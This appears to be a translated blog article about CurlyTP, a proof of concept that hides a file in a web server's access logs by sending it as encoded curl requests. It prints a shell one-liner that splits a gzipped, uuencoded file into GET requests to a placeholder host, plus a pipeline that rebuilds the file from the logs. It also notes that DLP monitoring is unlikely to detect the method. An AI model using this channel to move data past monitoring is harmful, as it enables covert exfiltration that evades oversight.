Secret messaging through server logs

According to the definition on Wikipedia, a dead drop cache is a conspiracy tool that serves to exchange information or some kind of object between people using a secret location. The point is that people never meet - but at the same time exchange information, maintaining operational safety.



The cache should not attract attention. Therefore, in the offline world, often discreet things are used: loose brick in the wall, a library book or a hollow in a tree.



There are many tools on the Internet for encryption and anonymization, but the fact of using these tools attracts attention. In addition, they can be blocked at the corporate or state level. What to do?



Developer Ryan Flowers suggested an interesting option - use any web server as a cache . If you think about it, what does the web server do? It accepts requests, issues files and writes a log. And he writes to the log all requests, even incorrect ones !



It turns out that any web server allows you to save almost any message in the log. Flowers wondered how to use it.



He offers this option:



  1. We take a text file (secret message) and calculate the hash (md5sum).

  2. We encode it (gzip + uuencode).

  3. We write to the log by knowingly incorrect request to the server.


Local: [root@local ~]# md5sum g.txt a8be1b6b67615307e6af8529c2f356c4 g.txt [root@local ~]# gzip g.txt [root@local ~]# uuencode g.txt > g.txt.uue [root@local ~]# IFS=$'\n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh
      
      





To read the file, you need to perform these operations in the reverse order: decode and unzip the file, verify the hash (the hash can be safely transmitted over open channels).



Spaces are replaced by =+=



so that there are no spaces in the address. The program, which the author called CurlyTP, uses base64 encoding, as in email attachments. The request is made with the keyword ?transfer?



so that the recipient can easily find it in the logs.



What do we see in the logs in this case?



 1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0" 1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0" 1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"
      
      





As already mentioned, to receive a secret message, you need to perform operations in the reverse order:



 Remote machine [root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue [root@server /home/domain/logs]# uudecode g.txt.gz.uue [root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz [root@server /home/domain/logs]# gunzip g.txt.gz [root@server /home/domain/logs]# md5sum g a8be1b6b67615307e6af8529c2f356c4 g
      
      





The process is easy to automate. Md5sum matches, and the contents of the file confirm that everything was correctly decoded.



The method is very simple. “The point of this exercise is only to prove that files can be transferred through innocent small web requests, and it works on any web server with regular text logs. In fact, every web server is a cache! ”Writes Flowers.



Of course, the method only works if the recipient has access to the server logs. But such access is given, for example, by many hosters.



How to use it?



Ryan Flowers says he is not an information security specialist and will not make a list of possible applications of CurlyTP. For him, this is just a proof of concept that the familiar tools that we see daily can be used in an unconventional way.



In fact, this method has several advantages over other server "caches" such as Digital Dead Drop or PirateBox : it does not require special configuration on the server side or any special protocols - and will not cause suspicion among those who monitor the traffic. It is unlikely that SORM or the DLP system will scan URLs for compressed text files.



This is one way to send messages through service files. You may recall how some advanced companies used to post job openings for developers in HTTP headers or in HTML page code.







The idea was that only web developers would see such an “easter egg,” since a normal person would not view the headers or HTML code.






All Articles